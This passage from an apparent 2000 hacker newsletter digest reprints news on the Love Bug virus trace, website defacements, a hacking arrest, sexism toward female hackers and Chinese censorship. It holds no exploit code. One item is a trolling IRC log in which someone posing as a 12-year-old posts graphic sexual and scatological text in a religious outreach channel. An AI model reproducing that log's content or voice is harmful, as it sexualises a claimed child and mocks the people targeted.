      http://www.infowar.com/hacker/00/hack_061200a_j.shtml     
      
      6/12/00
      Swedish Hacker-Tracker Is FBI And Media Darling
      By Eva Sohlman
      
      STOCKHOLM (Reuters) Saturday June 10 10:26 PM ET- The FBI, desperate to 
      track down the source of the ``Love Bug'' computer virus last month, 
      turned to a shy 19-year-old Swedish student.

      Jonathan James came under the media spotlight after he helped the world's 
      most famous crime-busting agency trace the origins of the virus that 
      caused billions of dollars in damage to computers around the world.

      But right now he is more interested in getting through his school exams 
      and enrolling in law school later this year.

      In recent weeks more than 150 foreign journalists have called James or 
      traveled to his home -- a country cottage a short distance outside the 
      university town of Uppsala -- to get his story.

      James is unfazed by the media attention. He is concentrating on finishing 
      his school exams this month and is setting up a joint venture for computer 
      security solutions.

      The journalists are not the only ones to court James.

      The U.S. Federal Bureau of Investigation (FBI) calls him several times a 
      week to discuss security issues and ways of tracing computer hackers.

      The first time they contacted him, he said, was when he had tracked down 
      the creator of the ``Melissa'' virus in 1999 -- something the FBI still 
      have not acknowledged officially.

      ``Well, I suppose it's hard to admit someone else did their job,'' James 
      told Reuters.

      He recalled how they seemed to expect him to be honored by their call and 
      spoke to him condescendingly. ``But I called them by their first names and 
      that cooled them down.''

      James says he is not interested in hacking or computer games, and denied 
      that he was working on a new virus.

      With the media frenzy surrounding ``Melissa'' still fresh in his mind, he 
      told the FBI he would not help track the ``Love Bug'' when it emerged at 
      the beginning of May.

      ``I had decided that this time they would have to do it on their own but 
      then I had a few hours left over on the Sunday..., he said.

      James decided to try to find out who was behind the virus when another 
      Swede pointed the finger at a German student.

      Within hours he had gathered information on some well-known hackers' 
      styles of programming and found one which had elements in common with the 
      ``Love Bug.''

      The next day, the Washington Post, drawing on U.S. officials, reported 
      James' findings as the most crucial and later in the day a 24-year-old 
      Philippine computer student who had submitted a thesis describing a 
      program similar to the virus, was arrested.

      The FBI had come to the same conclusion, James says.

      The only difference was that it had taken them days.

      U.S. security expert Richard M. Smith said many computer experts had taken 
      part in the virus hunt but that James was the single most important 
      player.

      ``Jonathan found extremely important clues and if he hadn't been around it 
      would have taken some more days to find the guy,'' Smith said.

      International Top-Hacker Career Not On The Agenda

      But a career as a professional hacker, working for the world's most 
      sophisticated intelligence services, does not appeal to James.

      ``I want to be my own boss and decide myself what I should or shouldn't 
      do,'' he said.

      He will start law studies at university later this year.

      ``I've wanted to study law since I was nine -- even before I got into 
      computers -- and I think it could be fruitful to combine it with 
      computers.''

      James says he is interested in security programming computers because it 
      resembles the language studies that fascinate him.

      Studies in Greek, German, English and Latin help him to trace the origins 
      of words -- something he says he enjoys while reading.

      The Swedish spy story writer Jan Guillou and American author John Grisham 
      are his favorite writers.

      In the little spare time he has James practices martial arts, listens to 
      all kinds of music, especially American hip-hop, and hangs out with his 
      half-English family who have helped him keep his feet firmly on the ground 
      during the media circus.

      He tells of the time a journalist from French television was standing 
      outside his house at 9.30 in the morning and caught him in his underwear.

      ``I was only wearing boxer shorts and there she was. She never wanted to 
      leave but just sat there on our sofa and left around one o'clock in the 
      afternoon.''

      Governments Lax On Security

      James said he could not understand computer crime or why some people 
      seemed to get a thrill from it.

      ``It's just vanity that seems to drive those hackers,'' he said.

      He criticized governments for being too lax with security, adding that he 
      had found a big security hole in the homepage of Sweden's ruling Social 
      Democrats but it took three weeks before it was sorted out.

      He thinks worries about the security of on-line shopping are over-hyped 
      because it is much harder to obtain credit card numbers without being 
      traced than most people believe.

      On the other hand there is no such thing as a 100 percent safe Web site, 
      he concluded. 
      
      @HWA
      
262.0 [IND] Hackers Force HK Government Website to Shut Down Again
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      6/12/00
      Hackers Force HK Government Website to Shut Down Again
      8:49 Monday 12 June 2000 
      AFP
      
      HACKERS launched a further attack on a Hong Kong government website 
      yesterday, forcing officials to close the site down for the second time in 
      less than 24 hours, a spokesman said.

      The government decided to temporarily shut down the Interactive Government 
      Services Directory website "to solve problems created by two defacement 
      cases over the weekend'', it said in a statement.

      "We resumed service at 2 am today after a defacement yesterday, but the 
      website was still subjected to further attacks,'' the government spokesman 
      said yesterday.

      Hackers attacked the site in the afternoon following an attack on Saturday 
      which forced the site to shut down for more than 10 hours.

      "The other government websites have not been affected,'' the spokesman 
      said.

      "The outward symptoms of the two attacks are similar with the homepage 
      being defaced and replaced by messages,'' he said.

      The government shut down the affected homepage yesterday after the 
      messages "Own3d by the Crows'' and "hacked by O Analista'' were found 
      posted on the site.

      Analista means analyst in Spanish.

      Police were investigating the case, the government statement said.

      The government successfully fended off two attempts to hack into its website last year.
      
      http://www.it.fairfax.com.au/breaking/20000612/A61920-2000Jun12.html 
      
      @HWA
      
 263.0 [IND] Dozens of Malaysian Political Web Sites Hacked
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 12 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061200c_j.shtml
      
           
      Dozens of Malaysian political Web sites hacked 
      By The Associated Press
      Special to CNET News.com
      June 11, 2000, 8:45 a.m. PT 
      
      KUALA LUMPUR, Malaysia--Hackers have broken into dozens of Malaysian 
      political Web sites, leaving government officials and opposition leaders 
      fuming today over images of rotting skulls and obscene messages. 

      One vandal, calling himself "Xenophoria," attacked 21 pro-government Web 
      sites, posting a list of demands for greater press freedom and an end to 
      corruption. 

       
      "Stop government intervention in media. Justice for all," the hacker 
      wrote. 

      Cyberspace has been a fierce battleground for Malaysian politics in the 
      past year, with more than 100 anonymously run Web sites fueling debate 
      over the country's leadership and laws. 

      Opposition leaders rely heavily on the Internet to drum up support, 
      because they say the tightly controlled mainstream press is biased. 

      The government, however, often plays down the Internet's potential impact 
      on voters in Malaysia, where many of the country's 22 million people live 
      in rural areas with limited Internet access. 

      Both sides have so far condemned the hacking, which apparently began 
      Friday, and vow to expose the culprits. 

      "We don't condone such foolish conduct," said Tian Chua, vice president of 
      the opposition National Justice Party. "These are unreasonable acts of 
      cowardice which benefit neither the government nor the opposition." 

      A popular opposition Web site called "Laman Reformasi," or "Reformation 
      Site," was reported to have been attacked first. 

      The vandal, who identified himself as "Junior Hacker," posted several 
      obscene pictures on the Web site, in an apparent reference to jailed 
      politician Anwar Ibrahim, who is on trial for sodomy. 

      Opposition loyalists retaliated by penetrating their rivals' Web sites and 
      branding supporters of the government as "fanatics." 

      Politics online surged shortly after Prime Minister Mahathir Mohamad 
      sacked Anwar as his deputy in September 1998, calling him an immoral 
      homosexual. 

      Anwar was subsequently sentenced to six years in jail for corruption and 
      faces another twenty years if convicted of sodomy. He claims Mahathir 
      orchestrated a conspiracy to oust him. 

      Copyright  2000 Associated Press. All rights reserved. This material may 
      not be published, broadcast, rewritten, or redistributed. 
      
      
      
      @HWA
      
      
 264.0 [IND] Youth Nabbed in Singapore for Hacking in Australia
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 12 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061200d_j.shtml     
      
      6/12/00
      Youth Nabbed in Singapore for Hacking in Australia
      9:08 Monday 12 June 2000 
      
      DPA
      
      AN INDONESIAN youth who hacked into the computer server of a Singapore 
      research and development institute while studying in Australia was 
      arrested on coming to the city-state to study, it was reported on 
      Saturday.

      The 15 year-old boy, who was released on 10,000 Singapore dollars 
      ($A11,834) bail, was nabbed at his relative's apartment and his new 
      computer seized, The Straits Times said.

      Police said the student hacked into the server at the Data Storage 
      Institute when he was in Australia during March and April.

      The boy learned from an Internet chatroom that the institute's network was 
      vulnerable and could be hacked into easily, they said.

      He continued hacking into the system after arriving in Singapore to study 
      English and mathematics and was tracked down by the police Computer Crime 
      Branch.

      A specialist at the institute had found unauthorised computer programmes 
      within the system and unauthorised user accounts in operations. Some of 
      the connections were made through overseas computer systems.

      A spate of hacking incidents has prompted Singapore judges to slap jail 
      sentences on youthful offenders instead of probation.

      Police said they were continuing their investigation into the latest case.
      
      http://www.it.fairfax.com.au/breaking/20000612/A61943-2000Jun12.html 
      
      
      @HWA
      
265.0 [IND]Facing a Mans World:Female Hackers Battle Sexism to Get Ahead
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 12 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061200e_j.shtml     
      
      6/12/00
      http://abcnews.go.com/sections/tech/DailyNews/hackerwomen000609.html
      Facing a Mans World
      Female Hackers Battle Sexism to Get Ahead
      
      The experience of women at the entry levels of the hacking scene, mostly in
      online chat groups, is one of relentless sexual harassment. It is a hard 
      battle for women to be respected in a culture dominated by teenage boys
      
      By Sascha Segan
      
      June 9  For women hackers, theres a different kind of glass ceiling to break.
           Hacking has traditionally been a mans world. But women are quietly breaking
           into the hacker subculture, a loose group of computer enthusiasts who meet 
           in online chat rooms and at real-life conventions.
           
           Not surprisingly, as in other male-dominated spheres, these women are often
           harassed and mocked by certain insiders  though here it is by teenage boys,
           who make up most of the entry levels of hackerdom.
           
           The chat rooms where beginning hackers often learn technical tricks are 
           stocked with little hacking boys from hell how awfully rude they are, and how
           intelligent they are, according to a hacker who goes by the handle Natasha 
           Grigori and heads antichildporn.org, an organization of hackers who track down
           child pornographers on the Net.
      
      R-E-S-P-E-C-T
      
      But the few female hackers dont network with each other  in fact, some of their
      greatest trouble comes from other women, called scene whores hacker groupies
      who use sex to get ahead. Fortunately, the few women who break through to the 
      elite ranks of hacking find that at the top, what matters is your technical skills,
      not your gender.
      
        If you can match their [male hackers] skill level and better it, theyll give 
        you every ounce of respect.  Its when a female comes in and tries to play on 
        her being feminine, that doesnt get you anything,  says Blueberry, a 32-year-old
        woman from Brisbane, Australia, who founded condemned.org, another anti-child 
        porn organization.
        
        ABCNEWS.com spoke to more than a dozen female hackers from the United States, 
        Australia and New Zealand for this two-part series. Last weeks piece 
        looked at who the female hackers are; this week, we examine the challenges 
        they face.
        
        A note about names: Like most hackers, these women choose to go by online 
        handles. Real names will be specifically marked as such.
      
      Hackers vs. Scene Whores
      
      Courtnee, a 20-year-old hacker from the Pacific Northwest, says the prevalence
      of hacker groupies makes it more difficult for true female hackers to get respect
      (www.twistedlens.com)   
      
      There are plenty of women at hacker conventions theyre just not all hackers.
      Some are girlfriends, some wives. But the female hackers nemesis is the scene 
      whore. These latex-clad hacker groupies haunt conventions and offer teenage boys 
      cybersex in chat rooms to boost their own self-esteem, female hackers say.
      
           The average woman, in todays society, could remain unnoticed, says Blaise,
           a 29-year-old woman from New Zealand. Looking at an average woman in a 
           computer society that consists of mainly antisocial men, she will be the 
           center of attention. Its those girls that give every woman a reputation
           ...and thats what you have to prove yourself against before you gain any
           respect.
            
           And the prevalence of scene whores has shattered any female solidarity that
           might exist among the hacker community, as groupies fight over the most 
           highly skilled men and real female hackers fight the boys assumption that
           all women in the scene are groupies.
           
           When I first started in the scene, this one person said, you know, you can
           be my cyberwhore and youll be elite through association, says Blueberry, 
           who says she rejected the advance.
           
           Dark Tangent, head of Defcon and a prominent male hacker, remembers a scene 
           whore having videotaped sex with a male hacker in an elevator at the 
           conventions Las Vegas hotel. He warns of evil groupies who condition poorly
           adjusted male hackers to think of women as sex toys.
           
           Natasha says she regularly has to throw women out of the IRC chat room that
           she hosts because they disrupt the tech talk by offering cybersex to her teenage
           charges.
           
           Its really bad as far as the women ripping each other to shreds. This whole 
           cybersex thing really bothers me, Natasha says. 
           
           A_kitten, a 34-year-old woman from California whose Web site features sexy photos 
           of herself, has been described as everything from a scene whore to a Cult leader
           by terrified male hackers unwilling to give names to a reporter for fear of her 
           legion of groupie script kiddies who used to crash sites on her command. 
           
           She doesnt deny using her femininity to get her way in a male-dominated society. 
           People just assume that since I am a girl and I have that power that I must be 
           abusing it, she says. I think some guys are intimidated or offended by the natural
           power that women possess.
            
           But St. Jude Milhon, a prominent hacker from Berkeley, Calif., doesnt see using
           feminine wiles as part of the spirit of hacking. It wouldnt be sporting. Simply
           be present, honest, reasonably competent, female, and everyones aghast.
           
      
      Fighting to Be Heard
      
      But its a hard battle for women to be respected in a culture dominated by teenage boys.
      The experience of women at the entry levels of the hacking scene, mostly in online chat 
      groups, is one of relentless sexual harassment. 
      
      British sociologist Paul Taylor, author of Hackers: Crime in the Digital Sublime, terms 
      this the Wild, Wired West, a rough-and-tumble social environment determined by the 
      attitudes of insecure teenage boys trying to impress each other with typed testosterone.
       
      Its almost like some Lord of the Flies-type environment, he says, referring to William
      Goldings novel about a group of teenage boys who descend into feral savagery when cut 
      off from civilization. 
      
      The anonymity of online interaction also fuels sexual harassment, making it more difficult
      to enforce social rules and freeing the most maladjusted young men to take out their sexual
      frustrations on people with feminine handles, Taylor says.
      
      The first time I posted, I posted with a womans nickname. I was ripped to shreds: Youre 
      a woman, get off here, were not going to help you, Natasha says. When RosieX, founder of
      the Australian cyberfeminist magazine GeekGirl, got into the online bulletin board scene in
      1990, she found women so intimidated by that attitude that they pretended to be male to avoid
      harassment.
      
      I was frustrated, because I wanted to learn skills and all the boys wanted to do was f---,
      she says.
      
      Even a_kitten, who takes pride in her power over those boys, sneers at them. 
      
         For every 50 jerks on IRC, I stumble upon one nice guy that I can talk to, she says.
      
      Non-Sexist Elite
      
      But the sexual gantlet seems to fade with experience. Defcons Dark Tangent says top-rank
      hackers generally stay away from the IRC channels, waiting to see whose thirst for knowledge
      is great enough to survive the savage atmosphere. To them, skill is all that matters, not the 
      body it comes in.
      
      when you interact with people such as the L0pht, or the cDc or the most experienced members of
      the hacker culture, gender is a non-issue. Its what you know that matters, and less who you are,
      says Javaman, a Philadelphia-area hacker. There is sexism at the lowest levels, but among the 
      more skilled people, the more able people, it really is a non-issue.
       
      And at conventions, hackers seem to love nothing more than a woman who can fix a network 
      Breakdown. Though theyre tormented online, for some reason the rare women in hacking are
      treasured in person, female hackers say.
      
      Girls are victimized only in the bodiless state in the flesh, theyre objects of wonder and
      fascination, says Milhon.
      
      @HWA
      
      
266.0 [IND] Social study: staunch religious hackers?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      (url pulled)      
      
      Interesting discussion sent in detailing something about religion and how it affects
      the modern hacker culture, or is it just some guy taking the piss out of some _____r
      h___ r_____s? - Ed
      
            
      Submitted by: Mehmet Ali Agca and the Christpunchers

       Starting logfile IrcLog
      IRC log started Mon Jul 10 13:27:27 2000
       Value of LOG set to ON
      <Holysmoke> cool noticed that a couple of new ones have been added
      <ShermAway> yes
      <wreath> servers up to 124 now!
      <ShermAway> IOM has set up quite a few specialist channels on ccnet
      <joshua_4_jesus> i've been asking jesus what to do
      <ShermAway> including #cult_outreach, #abuse_outreach, #youth_outreach, #porn_outreach etc
      <Denis> I just read the doctrinal statement on the web page.  I was impressed.
      <joshua_4_jesus> but i just can't find the answeres
      <joshua_4_jesus> can anyone help?
      <Denis> What is your question joshua?
      <ShermAway> what about joshua?
      <joshua_4_jesus> ok
      <ShermAway> r u from a gay background joshua?
      <joshua_4_jesus> i know the bible teaches me not to be gay
      <joshua_4_jesus> but i'm lusting over this guy that is also gay
      <joshua_4_jesus> i know lust is a sin
      <ShermAway> would u like to read an email i wrote about ministering to gays?
      <joshua_4_jesus> but i can't control my urges
       SignOff wreath: #Gay_Outreach (Connection reset by peer)
      <joshua_4_jesus> what should i do?
      <Denis> It only feels like you can not control your urges joshua, God says that you CAN control them with His help.  One aspect of the fruit of the Spirit is *self-control*
      <ShermAway> well for a start joshua u have to realise you cannot do this in your own strength
      <ShermAway> we are powerless to fight sin in our own strength
      <ShermAway> the bible calls that striving
      <joshua_4_jesus> amen
      <joshua_4_jesus> but how do i do that?
      <ShermAway> and we set ourselves up for a fall when we do
      <ShermAway> we must rely on Gods ability to deliver us from temptation
      <ShermAway> and to set us free from the works of the flesh
      <joshua_4_jesus> temptation is strong, though
      <ShermAway> yes it is.....
      <ShermAway> how old r u joshua?
      <joshua_4_jesus> 12
      <ShermAway> hmm
      <ShermAway> really?
       Adri [CCNet6.0@edtn013749.hs.telusplanet.net] has joined #Gay_Outreach
      <joshua_4_jesus> yes
      <Denis> josh, have you given in to your lusts and had sex with anyone?
      <Eagle^> how olds this other boy Jushua?
      <joshua_4_jesus> Denis: no
      <Denis> Good!
      <joshua_4_jesus> Eagle^: i don't know
      <Eagle^> ok
      <ShermAway> are u a christian josh?
      <joshua_4_jesus> ShermAway: hardcore 100%
      <ShermAway> :)))
      <ShermAway> good
       Guest42617 [JAVGUEST@98AF8102.ipt.aol.com] has joined #Gay_Outreach
      <ShermAway> do u believe God can help u?
       Guest42617 is now known as Tzadok
      <Tzadok> Hi Sherm
      <Denis> josh, work like crazy NOT to do it brother.  Right now you have no experiential history that can be used to draw your further into sin.  Make a real strong cimmittment not to give into you desires.
      <joshua_4_jesus> ShermAway: yes
       Tzadok was kicked off #gay_outreach by ShermAway (ShermAway)
       mode/#Gay_Outreach [+b *!*@98AF8102.ipt.aol.com] by ShermAway
      <ShermAway> autoban on him folks
      <ShermAway> hes a troublemaker
      <ShermAway> josh - do u read your bible?
      <Denis> Growing up in Jesus is all about saying no to the evil desires that we face.  That is part of what it means to become a man.
      <joshua_4_jesus> ShermAway: not as much as i should
      <ShermAway> ok do u where 1 corinthians is?
      <joshua_4_jesus> i love god and i want him to be my best friend.  he is my home boy.
      <joshua_4_jesus> ShermAway: yes
      <ShermAway> ok look up this verse
      <ShermAway> 1 cor 10:13
      <Denis>  No temptation has overtaken you but such as is common to man; and God is faithful, who will not allow you to be tempted beyond what you are able, but with the temptation will provide the way of escape also, that you may be able to endure it.
      <ShermAway> then believe it!!! God will provide an escape route out of all temptation
      <ShermAway> our part is to look for it
      <ShermAway> and then take it!
      <ShermAway> :)
      <joshua_4_jesus> sounds like a plan
      <ShermAway> no to give into the sin 
      <ShermAway> yep
      <ShermAway> it works well if you trust God to deliver you from temptation
      <ShermAway> He always keeps His promises
      <Denis> It is such a wonderful thing to see how weak we are josh, and then to see how God's power can give us the strength to be pure and holy.  He is always there with His strength and with a way of escape.
      <joshua_4_jesus> i just want to shove my hard pounding love muscle into his greasy asshole as we are embraced in hot gay sex.  i want to feel his manliness inside of me.  i want to grab that mouth of his and take a big fat shit in it
      <Denis> oh dear
      >>> You have been kicked off #gay_outreach by ShermAway (ShermAway)
       [#gay_outreach] Banned from channel
      IRC log ended Mon Jul 10 13:40:02 2000
       
       |
      -=-
       |
       |
      
      @HWA
      
      
      
      
267.0 [IND] Ex-KGB Major Leads US War Against Hackers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 12 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061200f_j.shtml
           
      6/12/00 
      
      Ex-KGB Major Leads US War Against Hackers
      Date: 10/06/2000 By BEN FENTON in Washington
      
      A former senior KGB officer who defected to America is patenting a new 
      device to thwart hackers and could be the saviour of the US computer 
      industry.

      Victor Sheymov is also poised to become the next "dot com" 
      multi-millionaire after he left the service of American intelligence to 
      found a "cybersecurity" company outside Washington.

      The ex-KGB major has even persuaded James Woolsey, a former director of 
      the CIA, to join his board of directors.

      Mr Sheymov was smuggled out of Moscow with his wife and daughter by the 
      CIA. Soon he was working for the highly secretive National Security Agency 
      (NSA) trying to find ways of breaking into the KGB communications systems 
      that he had designed.

      He turned to the private sector after falling out with the CIA over the 
      dlrs 1 million ( pounds 670,000) he says he was promised as part of his 
      defection package. "The CIA cheated me in a major way," he told the New 
      York Times.

      Although he defected more than 20 years ago, he only settled his 
      differences with the American government last year. By then he had started 
      work on his "algorithm", a set of programming instructions for a computer, 
      which he believes can make any machine impregnable to hackers.

      Hacking has become a threat to America's military and corporate 
      infrastructure. Both the State Department and the FBI have been 
      embarrassed by breaches of computer security.

      The agency employs young hackers to test its own security and to break 
      into the systems of foreign governments, terrorist organisations and drug 
      syndicates.

      After perfecting his algorithm, Mr Sheymov used his former NSA colleagues 
      to test it. "We tried and we couldn't get in," said one expert hacker with 
      18 years of service at the agency.
      
      The Daily Telegraph
      
      http://www.smh.com.au:80/news/0006/10/text/pageone3.html 
      
      
      This material is subject to copyright and any unauthorised use, copying or mirroring is prohibited. 
      
      
      
      
      @HWA
      
268.0 [IND] Flagship Hong Kong Govt Web Site Defaced, Twice
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 13 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061300a_j.shtml     
      
      6/13/00
      Flagship Hong Kong Govt Web Site Defaced, Twice
      By Adam Creed, Newsbytes
      HONG KONG, CHINA,
      13 Jun 2000, 12:02 AM CST
      
      A flagship Hong Kong Government Web site was defaced twice over the 
      weekend, resulting in its eventual closure and the start of criminal 
      investigations by local police authorities.

      The Interactive Government Services Directory (IGSD) was recently launched 
      in Hong Kong - promoted as an online gateway to government services 
      information for Internet users.

      On June 10, a spokesman for Hong Kong's Information Technology Services 
      Department confirmed the directory Web site front page had been defaced 
      during the afternoon.

      "Two messages were found attached on the home page of the IGSD shortly 
      after 3.30 pm," said the spokesman. "To facilitate investigations into the 
      incident, we closed down the system at about 3.45 pm."

      It is unclear what the nature of the security breach was and if any 
      changes were made to secure access to the site ... because at around the 
      same time the following day the Web site was again defaced.

      The service was then shut down and remains offline as of Tuesday Hong Kong 
      time.

      The spokesman said the site would remain offline in order to "solve the 
      problems created by two defacement cases over the weekend."

      According to the Information Technology Services Department, the IGSD Web 
      site is hosted on a stand-alone server separate from Hong Kong Government 
      internal computer networks.

      The Hong Kong Police are investigating the matter.

      The IGSD Web site can be found at http://www.igsd.gov.hk . 
      
      @HWA
      
269.0 [IND] Modest Teenager Is FBI's Secret Weapon In War Against Cyber Crime
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 13 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061300b_j.shtml      
      
      6/13/00
      Modest Teenager Is FBI's Secret Weapon In War Against Cyber Crime
      
      The Federal Bureau of Investigation consults a 19-year-old student from 
      Sweden several times a week to discuss new strategies for their fight 
      against computer hackers, it has been revealed.

      News of Jonathon James' prowess as a cyber sleuth followed his 
      breakthrough in tracking down the culprit behind last year's Melissa 
      virus.

      And after news of the Love Bug broke in May, it was James who the FBI 
      turned to before its origins could be traced to the Philippines.

      So far more than 150 foreign journalists have called or visited him at his 
      home in Uppsala, a town just a few miles north of Stockholm.

      But despite mounting international fame, he is keen to play down his role 
      for the FBI, preferring to concentrate on his ongoing studies and plans 
      for a future business enterprise.

      However, he is prepared to offer some commentary on the current state of 
      global e-commerce and internet communications.

      While governments are generally still rather complacent about online 
      security, fears about online shopping are too often exaggerated, he told 
      Reuters reporters.
      
      Last updated: 12:18 Monday 12th June 2000.
      http://www.ananova.com/news/story/internet_us-internet-crime_142970.html 
      
      Modest teenager is FBI's secret weapon in war against cyber crime 
      
      The Federal Bureau of Investigation consults a 19-year-old student from 
      Sweden several times a week to discuss new strategies for their fight 
      against computer hackers, it has been revealed.

      News of Jonathon James' prowess as a cyber sleuth followed his 
      breakthrough in tracking down the culprit behind last year's Melissa 
      virus.

      And after news of the Love Bug broke in May, it was James who the FBI 
      turned to before its origins could be traced to the Philippines.

      So far more than 150 foreign journalists have called or visited him at his 
      home in Uppsala, a town just a few miles north of Stockholm.

      But despite mounting international fame, he is keen to play down his role 
      for the FBI, preferring to concentrate on his ongoing studies and plans 
      for a future business enterprise.

      However, he is prepared to offer some commentary on the current state of 
      global e-commerce and internet communications.

      While governments are generally still rather complacent about online 
      security, fears about online shopping are too often exaggerated, he told 
      Reuters reporters.
      
      Last updated: 12:18 Monday 12th June 2000.
      
      @HWA
      
270.0 [IND] Daemons on the Net:Stereotyping the hacker **
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 13 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061300c_j.shtml     
      
      6/13/00 
      
      Daemons on the Net
      Stereotyping the hacker
      Summary
      SunWorld columnist Carole Fennelly defends the term hacker and offers a rebuttal
      to "Invisible Enemies," a recent article in Vanity Fair that which she calls "a 
      sensationalist, good-versus-evil script filled with the sort of cheap stereotyping
      found in TV movies." (700 words)
      
      
      
      --------------------------------------------------------------------------------
      
      I was at a conference recently talking with the CEO of a computer security company who
      emphatically stated, "We don't hire hackers." Curious, I asked if she meant that her 
      company doesn't hire people with criminal records. She clarified: "We don't hire people
      who attend DefCon, have online handles, or who participate in hacker forums. Or who hang 
      around with hackers." In other words, her company doesn't hire people who don't conform 
      to the mainstream. I wonder how she and her HR department determine which job candidates
      are associating with undesirables?
      
      http://www.idg.net/ic_188368_1794_9-10000.html 
      
      
      UNIX SECURITY    
      
      --------------------------------------------------------------------------------
       
      By Carole Fennelly 
      I was at a conference recently talking with the CEO of a computer security company who
      emphatically stated, "We don't hire hackers." Curious, I asked if she meant that her company
      doesn't hire people with criminal records. She clarified: "We don't hire people who attend 
      DefCon, have online handles, or who participate in hacker forums. Or who hang around with 
      hackers." In other words, her company doesn't hire people who don't conform to the mainstream.
      I wonder how she and her HR department determine which job candidates are associating with 
      undesirables? 
      
      Is that perhaps why the term hacker is so controversial? Because hackers don't conform? The
      US Founding Fathers didn't conform, either. Down through the ages, any group that didn't conform
      to mainstream society was subject to various forms of persecution: the Inquisition, the Salem 
      witch trials and, more recently, the McCarthy hearings. 
      
      It's rather ironic that the United States, which was founded on the principles of accepting 
      diversity, supported McCarthy's modern version of a witch hunt. It's comforting to look back on
      those days of investigating subversives as a black moment in the history of democracy, from which
      we have thankfully learned a lesson. 
      
      But have we? The June issue of Vanity Fair has an article by Bryan Burrough titled 
      "Invisible Enemies." According to the editor, this is supposed to be an article detailing 
      "high-tech procedural detective work." In reality, it is nothing more than a sensationalist, 
      good-versus-evil script filled with the sort of cheap stereotyping found in TV movies. Perhaps 
      that was what Burrough was looking for in the first place. Who cares about the facts? After all,
      this is Vanity Fair -- entertainment, not real news. 
      
      I care. I care because I work in an industry where I have to deal with the consequences of this
      stereotyping. Burrough picked up on the squeaky-clean image of J.P. Vranesevich, founder of 
      AntiOnline, and cast him as the Hero of this little melodrama. It doesn't matter that Vranesevich
      is nothing more than a paid snitch with limited technical ability; he looks wholesome. He fits 
      the part of Upstanding American Youth. 
      
      Burrough chose Vranesevich's harshest critic, Attrition.org founder Brian Martin, to play the Villain.
      After all, Brian looks like he just stepped off the set of The Crow and hangs around with subversives.
      It doesn't matter that he is a six-year veteran of the professional security field and has the respect
      of law enforcement and journalists. He looks dangerous. He fits the part of the Evil Hax0r. 
      
      I won't get into the specifics of everything that's wrong with this 10,000-word article (though the 
      fact that it is 10,000 words too long is its first problem). Brian posted a rebuttal on the Attrition 
      site that addresses some of the issues. 
      
      "But", a techie might argue, "what do I care? I just want to know about the latest product releases
      and bugs. I don't care about that other stuff." Well, upper management does, and, like it or not, 
      mangers set the policies that govern how the techies play with the bits and bytes. Do you really want
      your managers to decide what nightclubs are acceptable for you and your fellow employees, and dictate
      the sort of person with whom you may associate? 
      
      "Oh, that'll never happen," you might say. Yeah. And we didn't think McCarthyism could happen here 
      either. McCarthyism isn't dead -- it's just found a new target.  
      
      About the author 
      
      Carole Fennelly is a partner in Wizard's Keys Corporation, a company specializing in computer security
      consulting. She has been a Unix system administrator for almost 20 years on various platforms, and 
      provides security consultation to several financial institutions in the New York City area.  
      
      @HWA
      
271.0 [IND] China: Defiant Cyber Surfers Play Cat-and-Mouse Game
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 13/(8th) 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_061300d_j.shtml     
      
      6/13/00
      China: Defiant Cyber Surfers Play Cat-and-Mouse Game
      JOSEPHINE MA Thursday, June 8, 2000
      
      Defiant cyber surfers in mainland China can run Web sites and circumvent 
      police control by using overseas service providers.
      
      The Web site run by Huang Qi - 6-4tianwang.com- operates via a US-based 
      Internet service provider. This means its content can be updated either on
      the mainland or in the United States and mainland surfers can easily slip 
      through filters set by mainland cyber police.
      
      http://technology.scmp.com/internet/DAILY/20000608084435429.asp 
      
      Published on Thursday, June 8, 2000
      INTERNET 
      
      
      Defiant cyber surfers play cat-and-mouse game 
      JOSEPHINE MA 
      
      Defiant cyber surfers in mainland China can run Web sites and circumvent 
      police control by using overseas service providers. The Web site run by 
      Huang Qi - 6-4tianwang.com- operates via a US-based Internet service 
      provider. This means its content can be updated either on the mainland or 
      in the United States and mainland surfers can easily slip through filters 
      set by mainland cyber police. 

      The site was still accessible on Wednesday and a statement about Mr 
      Huang's arrest - apparently by its operators in the US - was posted on its 
      homepage on Wednesday night. The chat room also remained open. When the 
      authorities try to block sites like 6-4tianwang.com, surfers can still 
      manage to access them by using overseas or other methods. 

      The Web site was launched in June last year as the first in China 
      dedicated to helping people find relatives abducted by traffickers. 

      The case of 6-4tianwang.com highlights the difficulties faced by mainland 
      authorities in policing the Internet. 

      Cyber police have issued numerous regulations to tighten their grip on the 
      Internet. And the State Council recently set up a special division under 
      its Information Office to monitor news on the Web. But there are plenty of 
      indirect routes to post messages on the net and there are always ways to 
      access them. 

      Examples include discussions about the 1989 Tiananmen Square crackdown - a 
      subject considered taboo by the authorities. No matter how fast Web 
      masters move to delete messages posted on their chat rooms, surfers can 
      always shift to other chat rooms to continue their discussions. 

      It was not the first time Mr Huang had been in trouble with the 
      authorities. The Web site was shut down by police in March over reports 
      concerning the human rights of Chinese labourers working overseas. It was 
